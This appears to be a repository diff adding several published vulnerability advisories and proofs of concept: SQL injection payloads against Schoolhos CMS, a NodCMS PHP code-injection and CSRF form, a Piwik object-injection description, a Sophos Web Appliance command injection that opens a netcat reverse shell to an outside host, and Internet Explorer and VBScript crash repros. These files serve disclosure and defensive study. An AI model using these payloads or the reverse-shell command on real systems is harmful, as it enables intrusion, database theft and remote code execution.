Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1931
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.7
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Schoolhos CMS is alternative to developing School Website. It's Free and Open Source under GPL License. Easy to install, user friendly and elegant design.
|
||||
|
||||
(Copy of the Vendor Homepage: http://www.schoolhos.com/ & https://sourceforge.net/projects/schoolhoscms/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a remote sql-injection vulnerability in the official Schoolhos v2_29 content management system.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-11-07: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A remote sql injection web vulnerability has been discovered in the official Schoolhos v2_29 content management system.
|
||||
The web vulnerability allows remote attackers to execute own malicious sql commands to compromise the application or dbms.
|
||||
|
||||
The sql injection vulnerability is located in the `kelas` parameter of the `index?p=siswakelas module POST method request.
|
||||
Remote attackers are able to execute own sql commands by usage of an insecure post method request through the vulnerable
|
||||
parameter of the own application. The attack vector of the vulnerability is application-side and the request method to
|
||||
inject is POST. The security vulnerability in the content management system is a classic select remote sql-injection.
|
||||
|
||||
The security risk of the vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7.
|
||||
Exploitation of the remote sql injection vulnerability requires no user interaction or privileged web-application user account.
|
||||
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] ./SCRIPTPATH/index.php?p=siswakelas
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] kelas
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The remote sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account and without user interaction.
|
||||
For security demonstration or to reproduce the sql-injection web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
-- PoC Session Logs ---
|
||||
[+] Place: POST > Parameter: kelas
|
||||
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: kelas=1' AND 4945=4945 AND 'SfWY'='SfWY
|
||||
|
||||
Type: UNION query
|
||||
Title: MySQL UNION query (NULL) - 3 columns
|
||||
Payload: kelas=-2062' UNION ALL SELECT NULL,CONCAT(0x71736b6271,0x43746d4846536767524d,0x716b6d6171),NULL#
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL > 5.0.11 AND time-based blind
|
||||
Payload: kelas=1' AND SLEEP(5) AND 'Wqrd'='Wqrd
|
||||
---
|
||||
[21 tables]
|
||||
+-----------------+
|
||||
| sh_agenda |
|
||||
| sh_album |
|
||||
| sh_berita |
|
||||
| sh_buku_tamu |
|
||||
| sh_galeri |
|
||||
| sh_guru_staff |
|
||||
| sh_info_sekolah |
|
||||
| sh_jabatan |
|
||||
| sh_kategori |
|
||||
| sh_kelas |
|
||||
| sh_komentar |
|
||||
| sh_mapel |
|
||||
| sh_materi |
|
||||
| sh_pengaturan |
|
||||
| sh_pengumuman |
|
||||
| sh_psb |
|
||||
| sh_sidebar |
|
||||
| sh_siswa |
|
||||
| sh_statistik |
|
||||
| sh_tema |
|
||||
| sh_users |
|
||||
+-----------------+
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The sql-injection vulnerability in the `kelas` parameter of the `index.php` file POST method request can be patched by usage of a secure
|
||||
prepared statement. Parse the parameter and encode the values to a secure format to prevent further
|
||||
sql-injection attacks. Escape the parameter and disallow usage of special chars.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the remote sql-injection web vulnerability in the schoolhos content management system is estimated as high. (CVSS 6.7)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Lawrence Amer (www.vulnerability-lab.com/show.php?user=Lawrence Amer)
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
|
||||
deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
|
||||
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
|
||||
|
||||
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
|
||||
|
64
platforms/php/webapps/40723.txt
Executable file
64
platforms/php/webapps/40723.txt
Executable file
|
@ -0,0 +1,64 @@
|
|||
<!--
|
||||
Title: NodCMS - PHP Code Execution
|
||||
Application: NodCMS
|
||||
Versions Affected: All Version
|
||||
Vendor URL: http://nodcms.com/
|
||||
Software URL: https://github.com/khodakhah/nodcms/archive/master.zip
|
||||
Discovered by: Ashiyane Digital Security Team
|
||||
Tested on: Windows 10
|
||||
Bugs: PHP Code Execution
|
||||
Date: 13-Sept-2016
|
||||
|
||||
|
||||
Proof of Concept :
|
||||
|
||||
Go to Languages menu , select one of languages (such as english) and
|
||||
from action click on Edit Language(en_lang.php).
|
||||
In opened page can see language keys and change them.
|
||||
Select one them(for example "Get More Information") and enter this one
|
||||
of payloads.
|
||||
|
||||
";exec('calc.exe');echo "1
|
||||
";phpinfo();echo "Code Injected
|
||||
|
||||
Code Executec...
|
||||
Now in "config.php" the payload injected.
|
||||
$lang["Get More Information"] = "";phpinfo();echo "Code Injected";
|
||||
|
||||
Because cmd is vulnerable to csrf can use this exploit:
|
||||
|
||||
-->
|
||||
<form method="post"
|
||||
action="http://localhost/nodcms-master/admin/edit_lang_file/1/en">
|
||||
<input name="data[]" type="text" value='";phpinfo();echo "Code Injected'>
|
||||
<input type="submit" value="Submit">
|
||||
</form>
|
||||
<!--
|
||||
|
||||
HTTP Request
|
||||
|
||||
http://localhost/nodcms-master/admin/edit_lang_file/1/en
|
||||
|
||||
POST /nodcms-master/admin/edit_lang_file/1/en HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:49.0) Gecko/20100101
|
||||
Firefox/49.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/nodcms-master/admin/edit_lang_file/1/en
|
||||
Cookie: __atuvc=15%7C41;
|
||||
grav-tabs-state={%22tab-content.options.advanced%22:%22data.content%22};
|
||||
ci_session=5563aaffb41e0fdf6a0cd65bc945e8c63053afe2;
|
||||
PHPSESSID=l9pgj92pnfddlt45f6fpf2tce7
|
||||
Connection: keep-alive
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 2601
|
||||
|
||||
POST Content:
|
||||
|
||||
data[]=";exec('calc.exe');echo+"1&data[]=All&data[]=Read+Info&data[]=Contact+us&data[]=Login&data[]=Sign+Up&data[]=Home&data[]=Please+Fill+Required+Fields&data[]=Map&data[]=Contact+form&data[]=Full+Name&data[]=Email+address&data[]=Subject&data[]=Request&data[]=Send+email&data[]=Some+Tips&data[]=This+form+is+just+for+who+is+already+our+website's+member!&data[]=If+you+don't+have+any+account+and+didn't+sign+in+before,+use+the+below+link+before+use+this+form!&data[]=You+can+use+your+email+address+or+username+for+sign.&data[]=Username+or+Email&data[]=Email&data[]=Password&data[]=Keep+me+logged+in&data[]=Sign+in&data[]=I+forgot+My+Password&data[]=Please+enter+a+username+or+email+address.&data[]=Please+enter+your+password.&data[]=Register&data[]=Quick+Registration&data[]=You+can+enter+your+email+address+using+the+box+below,+and+get+the+latest+news!&data[]=Enter+your+email+address&data[]=Register+now&data[]=Please+enter+a+valid+email+address.&data[]=Search&data[]=Comments&data[]=Please+send+us+your+feedback&data[]=Read+More&data[]=Search+result&data[]=loading...&data[]=Username+or+password+not+correct&data[]=Forget+password&data[]=Return+password&data[]=If+you+forgot+your+password,+you+can+enter+the+email+address+you+used+to+register+below.+You'll+receive+an+email+from+us+which+you+can+use+to+retrieve+your+password.&data[]=Submit&data[]=This+email+already+exists,+choose+another+email+address+or+click+on+forget+password.&data[]=We+made+a+new+account+for+you,+for+active+your+it+and+choose+your+password+click+on+this+link&data[]=Your+request+is+not+valid.&data[]=Set+password&data[]=Please+provide+a+password&data[]=Your+password+must+be+at+least+6+characters+long&data[]=Please+enter+the+same+password+as+above&data[]=We+send+you+a+link+to+your+email,+please+check+your+email+inbox+and+spam,+and+flow+that.&data[]=Login+now&data[]=Back+to+home&data[]=Choose+your+new+password&data[]=Insert+your+new+password&data[]=Insert+your+new+password+again&data[]=Confirm+your+account&data[]=Change+password+confirmation!&data[]=Your+account+is+active+now.&data[]=Password+Reset&data[]=Change+pass&data[]=Log+Out&data[]=Change+password&data[]=Change+Passwrod&data[]=Last+Password&data[]=New+password&data[]=Password+Confirm&data[]=Cancel&data[]=Last+password+not+correct
|
||||
-->
|
||||
|
||||
|
77
platforms/php/webapps/40724.txt
Executable file
77
platforms/php/webapps/40724.txt
Executable file
|
@ -0,0 +1,77 @@
|
|||
---------------------------------------------------------------
|
||||
Piwik <= 2.16.0 (saveLayout) PHP Object Injection Vulnerability
|
||||
---------------------------------------------------------------
|
||||
|
||||
|
||||
[-] Software Link:
|
||||
|
||||
https://piwik.org/
|
||||
|
||||
|
||||
[-] Affected Versions:
|
||||
|
||||
Version 2.16.0 and prior versions.
|
||||
|
||||
|
||||
[-] Vulnerability Description:
|
||||
|
||||
The vulnerability can be triggered through the saveLayout() method defined in /plugins/Dashboard/Controller.php:
|
||||
|
||||
210. public function saveLayout()
|
||||
211. {
|
||||
212. $this->checkTokenInUrl();
|
||||
213.
|
||||
214. $layout = Common::unsanitizeInputValue(Common::getRequestVar('layout'));
|
||||
215. $layout = strip_tags($layout);
|
||||
216. $idDashboard = Common::getRequestVar('idDashboard', 1, 'int');
|
||||
217. $name = Common::getRequestVar('name', '', 'string');
|
||||
218.
|
||||
219. if (Piwik::isUserIsAnonymous()) {
|
||||
220. $session = new SessionNamespace("Dashboard");
|
||||
221. $session->dashboardLayout = $layout;
|
||||
222. $session->setExpirationSeconds(1800);
|
||||
|
||||
User input passed by anonymous users through the "layout" request parameter is being stored into
|
||||
a session variable at line 221, and this is possible by invoking an URL like this:
|
||||
|
||||
http://[piwik]/index.php?module=Dashboard&action=saveLayout&token_auth=anonymous&layout=[injection]%26%2365536;
|
||||
|
||||
Since Piwik is not using "utf8mb4" collations for its database, this can be exploited in combination with a MySQL
|
||||
UTF8 truncation issue in order to corrupt the session array, allowing unauthenticated attackers to inject arbitrary
|
||||
PHP objects into the application scope and carry out Server-Side Request Forgery (SSRF) attacks, delete arbitrary
|
||||
files, execute arbitrary PHP code, and possibly other attacks. Successful exploitation of this vulnerability
|
||||
requires Piwik to use the database to store session data (dbtable option) and the application running on
|
||||
PHP before version 5.4.45, 5.5.29, or 5.6.13.
|
||||
|
||||
|
||||
[-] Solution:
|
||||
|
||||
Update to version 2.16.1 or later.
|
||||
|
||||
|
||||
[-] Disclosure Timeline:
|
||||
|
||||
[08/02/2016] - Vendor notified
|
||||
[09/02/2016] - Vendor replied not to be able to reproduce the issue
|
||||
[11/02/2016] - Proof of concept tested on demo.piwik.org sent to the vendor
|
||||
[11/02/2016] - Vendor response stating the issue will be fixed in 2.16.1 release
|
||||
[17/02/2016] - Bug bounty received
|
||||
[11/04/2016] - Version 2.16.1 released: http://piwik.org/changelog/piwik-2-16-1/
|
||||
[16/06/2016] - CVE number requested
|
||||
[07/11/2016] - Public disclosure
|
||||
|
||||
|
||||
[-] CVE Reference:
|
||||
|
||||
The Common Vulnerabilities and Exposures project (cve.mitre.org)
|
||||
has not assigned a CVE identifier for this vulnerability.
|
||||
|
||||
|
||||
[-] Credits:
|
||||
|
||||
Vulnerability discovered by Egidio Romano.
|
||||
|
||||
|
||||
[-] Original Advisory:
|
||||
|
||||
http://karmainsecurity.com/KIS-2016-13
|
129
platforms/php/webapps/40725.txt
Executable file
129
platforms/php/webapps/40725.txt
Executable file
|
@ -0,0 +1,129 @@
|
|||
KL-001-2016-009 : Sophos Web Appliance Remote Code Execution
|
||||
|
||||
Title: Sophos Web Appliance Remote Code Execution
|
||||
Advisory ID: KL-001-2016-009
|
||||
Publication Date: 2016.11.03
|
||||
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt
|
||||
|
||||
|
||||
1. Vulnerability Details
|
||||
|
||||
Affected Vendor: Sophos
|
||||
Affected Product: Web Apppliance
|
||||
Affected Version: v4.2.1.3
|
||||
Platform: Embedded Linux
|
||||
CWE Classification: CWE-78: Improper Neutralization of Special Elements
|
||||
used in an OS Command ('OS Command Injection'),
|
||||
CWE-88: Argument Injection or Modification
|
||||
Impact: Remote Code Execution
|
||||
Attack vector: HTTP
|
||||
|
||||
2. Vulnerability Description
|
||||
|
||||
An authenticated user of any privilege can execute arbitrary
|
||||
system commands as the non-root webserver user.
|
||||
|
||||
3. Technical Description
|
||||
|
||||
Multiple parameters to the web interface are unsafely handled and
|
||||
can be used to run operating system commands, such as:
|
||||
|
||||
POST /index.php?c=logs HTTP/1.1
|
||||
Host: [redacted]
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
|
||||
Gecko/20100101 Firefox/46.0
|
||||
Accept: text/javascript, text/html, application/xml, text/xml, */*
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
DNT: 1
|
||||
X-Requested-With: XMLHttpRequest
|
||||
X-Prototype-Version: 1.6.1
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Content-Length: 305
|
||||
Connection: close
|
||||
|
||||
|
||||
STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Tue, 10 May 2016 15:35:05 GMT
|
||||
Server: Apache
|
||||
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
|
||||
pre-check=0
|
||||
Pragma: no-cache
|
||||
X-Frame-Options: sameorigin
|
||||
X-Content-Type-Options: nosniff
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=utf-8
|
||||
Content-Length: 207
|
||||
|
||||
{"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10
|
||||
4:35
|
||||
PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}
|
||||
|
||||
--
|
||||
|
||||
The vulnerable parameters are: by, request_id, and txt_filter_domain
|
||||
|
||||
That request launches the following process on the SWA:
|
||||
|
||||
1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c
|
||||
/opt/perl/bin/salp-generate-report.pl --report=Filter --res=-
|
||||
--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='
|
||||
--start='2016/05/10' --end='2016/05/10' --action=''
|
||||
--sid=590fca17b230e8cdba0394cfa28ef2eb
|
||||
|
||||
From the shell launched via netcat:
|
||||
|
||||
id;uname -a;uptime
|
||||
uid=1000(spiderman) gid=1000(spiderman)
|
||||
groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
|
||||
Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
|
||||
15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15
|
||||
|
||||
4. Mitigation and Remediation Recommendation
|
||||
|
||||
The vendor has issued a fix for this vulnerability in Version
|
||||
4.3 of SWA. Release notes available at:
|
||||
|
||||
http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html
|
||||
|
||||
5. Credit
|
||||
|
||||
This vulnerability was discovered by Matt Bergin (@thatguylevel)
|
||||
of KoreLogic, Inc.
|
||||
|
||||
6. Disclosure Timeline
|
||||
|
||||
2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos
|
||||
2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
|
||||
2016.09.28 - KoreLogic requests status update.
|
||||
2016.09.28 - Sophos informs KoreLogic that an update including a fix
|
||||
for this vulnerability will be available near the end
|
||||
of October.
|
||||
2016.10.13 - Sophos informs KoreLogic that the update was released to a
|
||||
limited customer base and is expected to be distributed
|
||||
at-large over the following week.
|
||||
2016.11.03 - Public disclosure.
|
||||
|
||||
7. Proof of Concept
|
||||
|
||||
See 3. Technical Description.
|
||||
|
||||
|
||||
The contents of this advisory are copyright(c) 2016
|
||||
KoreLogic, Inc. and are licensed under a Creative Commons
|
||||
Attribution Share-Alike 4.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-sa/4.0/
|
||||
|
||||
KoreLogic, Inc. is a founder-owned and operated company with a
|
||||
proven track record of providing security services to entities
|
||||
ranging from Fortune 500 to small and mid-sized companies. We
|
||||
are a highly skilled team of senior security consultants doing
|
||||
by-hand security assessments for the most important networks in
|
||||
the U.S. and around the world. We are also developers of various
|
||||
tools and resources aimed at helping the security community.
|
||||
https://www.korelogic.com/about-korelogic.html
|
||||
|
||||
Our public vulnerability disclosure policy is available at:
|
||||
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
|
115
platforms/windows/dos/40722.html
Executable file
115
platforms/windows/dos/40722.html
Executable file
|
@ -0,0 +1,115 @@
|
|||
<!--
|
||||
Source: http://blog.skylined.nl/20161104001.html
|
||||
|
||||
Synopsis
|
||||
|
||||
A specially crafted web-page can cause Microsoft Internet Explorer 9 to access data before the start of a memory block. An attack that is able to control what is stored before this memory block may be able to disclose information from memory or execute arbitrary code.
|
||||
|
||||
Known affected versions, attack vectors and mitigations
|
||||
|
||||
Microsoft Internet Explorer 9
|
||||
An attacker would need to get a target user to open a specially crafted web-page. As far as can be determined, disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
|
||||
-->
|
||||
|
||||
<!DOCTYPE html>
|
||||
<!-- This file must be loaded inside an iframe in another web-page to trigger the vulnerability. -->
|
||||
<html>
|
||||
<head>
|
||||
<style>
|
||||
oElement1 {
|
||||
position: absolute;
|
||||
}
|
||||
oElement2:after {
|
||||
position: relative;
|
||||
content: counter(x);
|
||||
}
|
||||
</style>
|
||||
<script>
|
||||
onload = function () {
|
||||
oElement1 = document.createElement('oElement1');
|
||||
document.documentElement.appendChild(oElement1);
|
||||
oElement2 = document.createElement('oElement2');
|
||||
document.documentElement.appendChild(oElement2);
|
||||
};
|
||||
</script>
|
||||
</head>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
Description
|
||||
|
||||
After adding two elements with specific style properties during the onload event handler, MSIE refreshes the layout, at which point the "content" style causes it to update a counter, which triggers a call to CPtsTextParaclient::CountApes, in which the exception happens on x86:
|
||||
|
||||
MSHTML!CPtsTextParaclient::CountApes:
|
||||
mov edi,edi
|
||||
push ebp
|
||||
mov ebp,esp
|
||||
sub esp,8
|
||||
push ebx
|
||||
mov ebx,dword ptr [eax+20h]
|
||||
push esi
|
||||
lea ecx,[eax+24h]
|
||||
push edi
|
||||
mov dword ptr [ebp-8],ecx
|
||||
mov dword ptr [ebp-4],0
|
||||
test ebx,ebx
|
||||
je MSHTML!CPtsTextParaclient::CountApes+0x1b7
|
||||
cmp ebx,dword ptr [ebp-8]
|
||||
je MSHTML!CPtsTextParaclient::CountApes+0x1b3
|
||||
mov eax,dword ptr [ebx] ds:0023:dcbabbbb=????????
|
||||
|
||||
I enabled page-heap to make triggering the issue more reliable and get a better idea of what is going on. To understand how, a bit of background on how page heap works is needed. When you enable full page-heap in an application, every heap allocation will be given its own "page". This page contains a data structure that contains information used by page-heap to store information about the allocation, followed by the allocated memory itself and then some optional padding. This structure is stored at the end of the page, with the user allocation aligned as required (hence the optional padding). This memory page is followed by a reserved page, which causes any out-of-bounds access immediately after the allocation to cause an access violation exception. Full details can be found in the Application Verifier documentation on-line.
|
||||
|
||||
As the documentation shows, the 0xdcbabbbb value in ebx that causes the access violation is used by page-heap as the "Prefix end magic": a marker at the end of the structure used by page-heap to store information about the allocation that comes immediately before the actual allocation. From the assembly we can see that ebx was read from eax + 0x20, so it might be interesting to ask page-heap where that points to:
|
||||
|
||||
1:020> !heap -p -a @eax
|
||||
address 0b00efb4 found in
|
||||
_DPH_HEAP_ROOT @ 51000
|
||||
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
|
||||
af126e8: b00efd8 24 - b00e000 2000
|
||||
71908e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
|
||||
77c15ede ntdll!RtlDebugAllocateHeap+0x00000030
|
||||
77bda40a ntdll!RtlpAllocateHeap+0x000000c4
|
||||
77ba5ae0 ntdll!RtlAllocateHeap+0x0000023a
|
||||
683928a3 MSHTML!CGeneratedTreeNode::InitBeginPos+0x00000016
|
||||
683926b4 MSHTML!CGeneratedContent::InsertOneNode+0x00000044
|
||||
6839264d MSHTML!CGeneratedContent::CreateNode+0x000000b8
|
||||
68392be1 MSHTML!CGeneratedContent::CreateContent+0x000000d6
|
||||
68392b0b MSHTML!CGeneratedContent::ApplyContentExpressionCore+0x00000109
|
||||
681a397c MSHTML!CElement::ComputeFormatsVirtual+0x000021c9
|
||||
682e9421 MSHTML!CElement::ComputeFormats+0x000000f1
|
||||
<<<snip>>>
|
||||
|
||||
This tells us that eax points to 0x0b00efb4, which is 0x24 bytes before the user allocated memory at 0xb00efd8. So eax + 0x20 must point 4 bytes before it and tada: this is where page-heap stores the "Prefix end magic".
|
||||
|
||||
It seems that this method is called to operate on an object using a pointer at an offset before the actually allocated memory. This does not make much sense until you've analyzed a lot of MSIE bugs: it's quite common in MSIE for an object to "contain" another object in memory, and for MSIE to add offsets to pointers to find a contained object, or to subtract offsets to find the container of such a contained object. It looks like this is the case here as well.
|
||||
|
||||
Looking at the caller, CPtsTextParaclient::GetNumberApeCorners, it appears to loop through some data structures. The call to CPtsTextParaclient::CountApes is made in the third loop.
|
||||
|
||||
MSHTML!CPtsTextParaclient::GetNumberApeCorners+0x103
|
||||
mov ecx,dword ptr [esi+0Ch]
|
||||
mov eax,dword ptr [ecx]
|
||||
and eax,1
|
||||
lea edx,[ebp+0Ch]
|
||||
lea eax,[eax+eax*2]
|
||||
push edx
|
||||
lea eax,[ecx+eax*8-24h]
|
||||
call MSHTML!CPtsTextParaclient::CountApes
|
||||
|
||||
This code uses a pointer to a memory structure (esi) to find pointer to a second structure (ecx). It reads a flag in eax and multiplies it by 0x18 (3 x 8: eax+eax*2 and eax*8), then subtracts 0x24. It then adds this to ecx to produce the eax value seen during the crash. Since the flag can be either 0 or 1, the result in eax can be either ecx - 0x24 or ecx. Obviously, in this case it is the former.
|
||||
|
||||
It appear that the code is using the flag to determine if ecx is a "stand-alone" object or a "contained" object. The bug is that either the code is using this flag incorrectly (the flag is correct, but does not indicate the object is a "contained" object) or the flag has been set incorrectly (the code is correct, but the flag should not have been set as the object is not "contained" in another object).
|
||||
|
||||
Exploitation
|
||||
|
||||
Using Heap Feng-Shui, it may be possible to allocated a heap block immediately before the one used in the bug and control its content in order to control the data the code is operating on. Unfortunately, at the time I did not look at what the code did with the data if the access violation could be prevented, so it's not possible for me to say exactly what an attacker might do with this vulnerability. But one can speculate that this might allow an attacker to have the code use some secret value (e.g. a pointer to a function in a modules) in a way that allows him/her to retrieve the value (i.e. information disclosure). It might be possible to have the code modify a value located anywhere in memory, and/or have the code call/jump to a location of an attackers choosing (i.e. arbitrary code execution).
|
||||
|
||||
I did not investigate the crash on x64, but I can only imagine the code is the same, but the offsets are different.
|
||||
|
||||
Time-line
|
||||
|
||||
June 2014: This vulnerability was found through fuzzing.
|
||||
August 2014: This vulnerability was submitted to ZDI.
|
||||
September 2014: ZDI rejects the submission.
|
||||
November 2016: Details of this issue are released.
|
||||
-->
|
220
platforms/windows/remote/40721.html
Executable file
220
platforms/windows/remote/40721.html
Executable file
|
@ -0,0 +1,220 @@
|
|||
<!--
|
||||
Source: http://blog.skylined.nl/20161107001.html
|
||||
|
||||
Synopsis
|
||||
|
||||
A specially crafted script can cause the VBScript engine to access data before initializing it. An attacker that is able to run such a script in any application that embeds the VBScript engine may be able to control execution flow and execute arbitrary code. This includes all versions of Microsoft Internet Explorer.
|
||||
|
||||
Known affected versions, attack vectors and mitigations
|
||||
|
||||
vbscript.dll
|
||||
The issue affects versions 5.6 through 5.8 and both the 32- and 64-bit vbscript.dll binaries.
|
||||
|
||||
Windows Script Host
|
||||
VBScript can be executed in the command line using cscript.exe/wscript.exe. An attacker would need to find a script running on a target machine that accepts an attacker supplied regular expression and a string, or be able to execute his/her own script. However, since the later should already provide an attacker with arbitrary code execution, no additional privileges are gained by exploiting this vuln.
|
||||
|
||||
Microsoft Internet Explorer
|
||||
VBScript can be executed from a web-page; MSIE 8, 9, 10 and 11 were tested and are all affected. MSIE 11 requires a META tag to force it to render the page as an earlier version, as MSIE 11 attempts to deprecate vbscript (but fails, so why bother?). An attacker would need to get a target user to open a specially crafted web-page. Disabling scripting, particularly VBScript, should prevent an attacker from triggering the vulnerable code path. Enabling Enhanced Protected Mode appears to disable VBScript on my systems, but I have been unable to find documentation on-line that confirms this is by design.
|
||||
|
||||
Internet Information Server (IIS)
|
||||
If Active Server Pages (ASP) are enabled, VBScript can be executed in Active Server Pages. An attacker would need to find an asp page that accepts an attacker supplied regular expression and a string, or be able to inject VBScript into an ASP page in order to trigger the vulnerability.
|
||||
Repro
|
||||
Below are three repro files that trigger the issue in Windows Script Host (repro.vbs), Microsoft Internet Explorer (repro.html), and Internet Information Server (repro.asp).
|
||||
|
||||
Repro.vbs:
|
||||
|
||||
Set oRegExp = New RegExp
|
||||
oRegExp.Pattern = "A|()*?$"
|
||||
oRegExp.Global = True
|
||||
oRegExp.Execute(String(&H11, "A") & "x")
|
||||
|
||||
Repro.html:
|
||||
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="X-UA-Compatible" content="IE=10">
|
||||
<script language="VBScript">
|
||||
Set oRegExp = New RegExp
|
||||
oRegExp.Pattern = "A|()*?$"
|
||||
oRegExp.Global = True
|
||||
oRegExp.Execute(String(&H11, "A") & "x")
|
||||
</script>
|
||||
</head>
|
||||
</html>
|
||||
|
||||
Repro.asp:
|
||||
|
||||
<%
|
||||
Set oRegExp = New RegExp
|
||||
oRegExp.Pattern = "A|()*?$"
|
||||
oRegExp.Global = True
|
||||
oRegExp.Execute(String(&H11, "A") & "x")
|
||||
%>
|
||||
|
||||
|
||||
Description
|
||||
|
||||
During normal operation, when you execute the RegExp.Execute method from VBScript the code in vbscript.dll executes the CRegExp::Execute function. This function creates a CMatch object for each match found, and stores pointers for all of these CMatch objects in a singly linked list of CMatchBlock structures (Note: the vbscript.dll symbols do not provide a name for this structure, so I gave it this name). Each CMatchBlock structure can store up to 16 such pointers, as well as a pointer to the next CMatchBlock. This last pointer is NULL unless all pointers in the CMatchBlock object are in use and more storage is needed, in which case a new CMatchBlock object is created and a link to the new object is added to the last one in the list. The code counts how many matches it has found so far, and this corresponds to the number of CMatch objects it has allocated.
|
||||
|
||||
The following pseudo-code represents these two structures:
|
||||
|
||||
CMatchBlock {
|
||||
00 04 CMatchBlock* poNextCMatchBlock
|
||||
04 40 CMatch* apoCMatches[16]
|
||||
} // size = 0x44 (x86) or 0x88 (x64)
|
||||
|
||||
CMatch {
|
||||
00 0C void** apapVFTables[3]
|
||||
0C 04 DWORD dwUnknown_0C
|
||||
10 04 DWORD poUnknownObject_10
|
||||
14 04 DWORD poUnknownObject_14
|
||||
18 04 DWORD poUnknownObject_18
|
